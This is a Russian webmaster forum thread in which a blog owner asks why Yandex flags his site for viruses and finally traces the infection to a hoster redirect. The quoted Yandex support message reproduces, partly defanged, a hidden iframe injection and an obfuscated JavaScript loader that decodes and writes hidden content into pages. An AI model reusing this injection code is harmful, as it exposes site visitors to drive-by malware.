Яндекс обнаружил вирусы.

J
На сайте с 18.12.2004
Offline
238
3400

http://blog.obmen.us/2010/02/blog-post_26.html 29.07.2011 Поведенческий анализ

http://blog.obmen.us/2007/05/webmoney.html 29.07.2011 Поведенческий анализ

http://blog.obmen.us/2008/06/rupau-rbc-money.html 29.07.2011 Поведенческий анализ

http://blog.obmen.us/2011/07/blog-post_25.html 31.07.2011 Поведенческий анализ

Вот докопался Яндекс до блога (платформа блоггер.ком).

Вирусы они нашли. Я весь код перекопал, не вижу не фига.

Написал запрос.

Платоны ответили (и тут они как тут)

------------------------------

Здравствуйте!

При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:

[iframe src="h**p://zemlyavozduh.cn/show.php?s=1893da9ce4" width="1" height="1" style="display:none;"></iframe]

а также

[script>xijor="22555522255522552555252225555225255255222552252522522222255525222555

52252555222225522525225555252252225225552522255225252555522225552522225255552552

22552555225525552255225222522255555222522255255525222555225525525225255255222252

22222555525525552555255252252552252225552522255252222255525222522222225522222555

22222555522222555255255252222552252525525225255225552552522225552522225552522252

22222255222225552222255552222255525525522552255522522552222525525525255225252552

22522552555525552252255225222552252525552252225552522252222225525552255255552255

52552555255225525225255522552552522525522252255252252552552225525225255525222555

52252255525222522222255252222552522525522522255225222552252525525552225552552555

55252255552222525555255522552555252225555225255255222552252522555552225555222552

52252552255225552252255222252552552525522525225222222552522525522522225555252252

22522555252225552255255252252552552222522252225222222555225525552252255222552255

552522522252255252222555252225552522255522222255525222525555225255552555225525552

52225552252255255552552555225522225255525222252555225522255255255552552552522525

55525552255225255552552522525525552225255522552225525522555255252252255555522552

25222522252225555522255552222525555255252252552255225552252255222252552552525522

52522555552";vpbvc=100;wxmeb=this;aknnp="i"+"te";ntak=116;dyujh="wr"+aknnp;for(buvld in wxmeb)

{if(buvld.length==8 && buvld.charCodeAt(0)==vpbvc && buvld.charCodeAt(7)==ntak)

{break;}}o="";psgpt=0;rgntm=wxmeb[buvld];rbho=53;while (psgpt<xijor.length){goibp=0;for(vxqle=0;vxqle<8;vxqle++)

{goibp=goibp<<1;if(xijor.charCodeAt(psgpt+vxqle)==rbho){goibp++;}}psgpt=psgpt+3;rgntm[dyujh](String.fromCharCode(goibp));psgpt=psgpt+5;}</script]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Пожалуйста, проверьте страницы Вашего сайта и удалите вредоносный код. Вскоре после этого наш робот перепроверит Ваш сайт и, если вредоносный код более не будет обнаружен, пометка в выдаче снимется. Перечень зараженных страниц можно узнать в Яндекс.Вебмастере ( http://webmaster.yandex.ru ).

--

С уважением, Платон Щукин

Служба поддержки Яндекса

http://help.yandex.ru/

================================

Я слепой?

Реально не вижу в коде того, что пишут. Уже даже страницу через онлайн сервисы проверки на вирусы прогнал. Вирусы видит только Яндекс.

Что делать?

Аттестация рабочих мест в Мурманске (http://arm.com.ru/)___Помоги детям песком (https://vk.com/kindcenter)
forestov
На сайте с 20.05.2008
Offline
88
#1

Была ситуация вчера, когда яндекс также нашел вирусы. Проверял программист весь код, ничего мы не нашли. Переставили движок сайта ( сайт на DLE).

Сегодня Яндекс проверил, пометка о вирусе исчезла- все ок.

Fruit
На сайте с 15.07.2008
Offline
166
#2

Сообщение снимается через несколько месяцев после удаления вируса. Сейчас вируса, похоже, нет. Подождите некоторое время, оно само пропадет. Можете заодно Платону черкануть.

forestov
На сайте с 20.05.2008
Offline
88
#3
Fruit:
Сообщение снимается через несколько месяцев после удаления вируса. Сейчас вируса, похоже, нет. Подождите некоторое время, оно само пропадет. Можете заодно Платону черкануть.

Каких месяцев? Вы где такое видели. После удаления вируса максимум неделя. А закажешь проверку через вэбмастер, проходило 3 дня. Там так и пишется, роботу нужно несколько дней для проверки вашего сайта ....

Fruit
На сайте с 15.07.2008
Offline
166
#4
forestov:
Каких месяцев? Вы где такое видели. После удаления вируса максимум неделя. А закажешь проверку через вэбмастер, проходило 3 дня. Там так и пишется, роботу нужно несколько дней для проверки вашего сайта ....

Оо Эм... Ну вообщем-то лично сталкивался. После удаления вируса, предупреждение не пропадало несколько месяцев.

Ilya
На сайте с 08.04.2007
Offline
142
#5

здравствуйте. соглашусь что сообщение по вирусу тоже более недели дней 10 не висело. там кнопочка есть в вебмастере- отправить на перепроверку и все дела.

а по поводу вируса- да- код проверить надо полюбому, а если нет- проверить еще раз. обычно эти су.. вирусы в пхп и скриптах свою строку запроса прописывают. ищите если нет ничего- отпишитесь в яндекс ручками.

и да поможет вам... с уважением

экспресс аудит сайта + рекомендации= 15 тыс. руб... статьи и контекст с быстрым индексом- в личные
AgrinG
На сайте с 21.06.2008
Offline
41
#6
jumbosic:




Я слепой?
Реально не вижу в коде того, что пишут. Уже даже страницу через онлайн сервисы проверки на вирусы прогнал. Вирусы видит только Яндекс.

Что делать?

На хостинге один сайт? Если несколько - проверьте их. У меня таке же было - сам сайт все пересмотрел. А один старый штмльный - нашел 11 страниц с ифрэйм.

После того как все почистил - другой сайт - все ок.

И ставьте почаще перепроверить. Иногда ничего не делая - через 1-2 проверки - все ОК!

Жизнь как собачья упряжка - только у вожака изменяется пейзаж.
B-u-s-t-e-r
На сайте с 04.05.2009
Offline
34
#7

проверьте он-лайн антивирусом свой сайт, указав урл:

1. с www

2. без www

Если результаты будут различаться - значит проблемы не у вас, а у хостера в системе редиректа.

У меня такое было пару лет назад, хостера сменил.

A
На сайте с 08.08.2007
Offline
149
#8

А рекламы никакой сторонней не ставили? Через их коды тоже проскакивает. Тоже было, несколько дней искали, пока не додумались рекламные коды проверить.

J
На сайте с 18.12.2004
Offline
238
#9

Код перерыт весь от и до.

Рекламы левой нет никакой.

Блог - гугловский блогер, и я не в куриваю (и не собираюсь то делать) какие там на их хостах есть еще сайты.

jumbosic добавил 09.08.2011 в 01:08

B-u-s-t-e-r:
проверьте он-лайн антивирусом свой сайт, указав урл:
1. с www
2. без www

Если результаты будут различаться - значит проблемы не у вас, а у хостера в системе редиректа.
У меня такое было пару лет назад, хостера сменил.

Есть. Сенкс огромный. На редиректе откопался вирусняк.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий